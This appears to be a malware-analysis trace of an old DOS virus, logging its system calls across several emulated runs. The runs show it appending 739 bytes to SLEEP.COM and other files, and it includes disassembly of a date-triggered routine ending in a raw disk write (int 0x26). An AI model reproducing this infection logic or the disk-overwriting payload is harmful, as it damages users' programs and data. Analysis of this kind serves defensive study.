2018-12-25T11:58:32.374281791Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.375825514Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.384170536Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.393472749Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.396944386Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.405267664Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.412544781Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.414188046Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.417798994Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.426607035Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.427906101Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.436839866Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.445979957Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.448648023Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.456187644Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.464257209Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.465722563Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.468805168Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.478283714Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.480096037Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.487484529Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.497094526Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.500015633Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.508222708Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.516067318Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.517591596Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.520518233Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.530980275Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.532651705Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.540065931Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.550085065Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.553414718Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.560908273Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.56827235Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.570093195Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.574440007Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.583142003Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.585260596Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.592402435Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.601583371Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.604851733Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:32.607395441Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:32.609763679Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:32.614628436Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:32.620910168Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:32.796961142Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:32.805192955Z 78 PC: 12afb | Find first file
2018-12-25T11:58:32.812060086Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:32.819284915Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:32.826533254Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:32.828090966Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.830930983Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:32.84689298Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:32.84861756Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.855735819Z 62 PC: 12aef | Close file
2018-12-25T11:58:32.86446723Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.867356268Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.875114863Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.881897187Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.883537511Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.886412342Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.895199567Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.897142159Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.904562656Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.914557627Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.91837526Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.925605577Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.933068191Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.941047822Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.944019481Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.953475856Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.955726601Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.96438415Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.973650154Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.975740905Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.980873417Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.987700153Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.989143865Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.992150197Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.000981999Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.003482454Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.010441288Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.016247924Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.020234594Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.032328998Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.040100389Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.041920447Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.048065999Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.056950587Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.05836955Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.066116759Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.077107235Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.080528468Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.087622092Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.09506771Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.096527788Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.099277366Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.108694391Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.11016649Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.118647569Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.128720211Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.131630461Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.139381626Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.148680334Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.150914485Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.154386297Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.17513423Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.177229807Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.184198466Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.193378833Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.19658632Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.198838235Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.201092667Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.007264893Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.008745781Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.01321145Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.017814266Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.026894655Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.028321905Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.030933113Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.055835814Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.057473636Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.064033935Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.073093725Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.075727144Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.082420772Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.089269508Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.093311746Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.097976381Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.106377003Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.10848573Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.114867855Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.329052142Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.332393705Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.339629845Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.346871491Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.348817155Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.351308383Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.44372956Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.446122751Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.45433362Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.463186485Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.466803685Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.474448569Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.480285835Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.482576981Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.48538489Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.49218808Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.49425627Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.501210159Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.509510027Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.512634367Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.519646665Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.526131148Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.528035513Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.532564964Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.540563252Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.542190512Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.549542831Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.557433426Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.560000908Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.567220469Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.573451314Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.575170439Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.578860837Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.587704096Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.589019686Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.596305683Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.60418496Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.606649959Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.613664502Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.619846454Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.621154892Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.624382101Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.632044278Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.633397283Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.639832045Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.651467725Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.654177403Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.656541934Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.659165984Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.0400906Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.041123075Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.047628481Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.054522757Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.061583681Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.065110697Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.06799337Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.083178571Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.085591951Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.092763165Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.102006583Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.1062217Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.118349579Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.125376311Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.127124199Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.131022805Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.140418225Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.141968636Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.149852339Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.159089228Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.168279221Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.176427111Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.183744315Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.185420892Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.189594279Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.198446637Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.199708576Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.207738972Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.217327564Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.221066312Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.229019048Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.237645141Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.239814122Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.243863714Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.25345473Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.255067203Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.263547631Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.273073397Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.276364269Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.283533439Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.291123133Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.293090179Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.295971251Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.306159409Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.307795628Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.315259579Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.325407242Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.333020954Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.341148335Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.347240493Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.348767859Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.351862312Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.362032399Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.365046923Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.372644469Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.381934253Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.38538738Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.392668863Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.400518422Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.402565294Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.405449649Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.414220899Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.415774242Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.421016035Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.426184219Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.428085788Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:33.429822118Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:33.431291593Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:33.186452749Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:33.187780449Z 78 PC: 12afb | Find first file
2018-12-25T11:58:33.193916016Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:33.198311913Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:33.203326715Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:33.204585605Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.207703633Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:33.440068905Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:33.441527971Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:33.44796357Z 62 PC: 12aef | Close file
2018-12-25T11:58:33.458550546Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.463047829Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.469742798Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.476179403Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.478496082Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.481891528Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.48994383Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.492219643Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.498582993Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.506672826Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.510655097Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.517012505Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.523339622Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.533400333Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.536156654Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.551180397Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.553659419Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.561217429Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.569480373Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.573201345Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.579604848Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.586499741Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.588810727Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.591819464Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.600264343Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.602231114Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.608918717Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.616796656Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.619535506Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.628077783Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.63426665Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:33.635576755Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:33.641380242Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:33.649209539Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:33.650614211Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:33.65757647Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:33.665454089Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:33.668437389Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:33.675640392Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:33.681740646Z 66 PC: 12b2d | Move file pointer (See above)
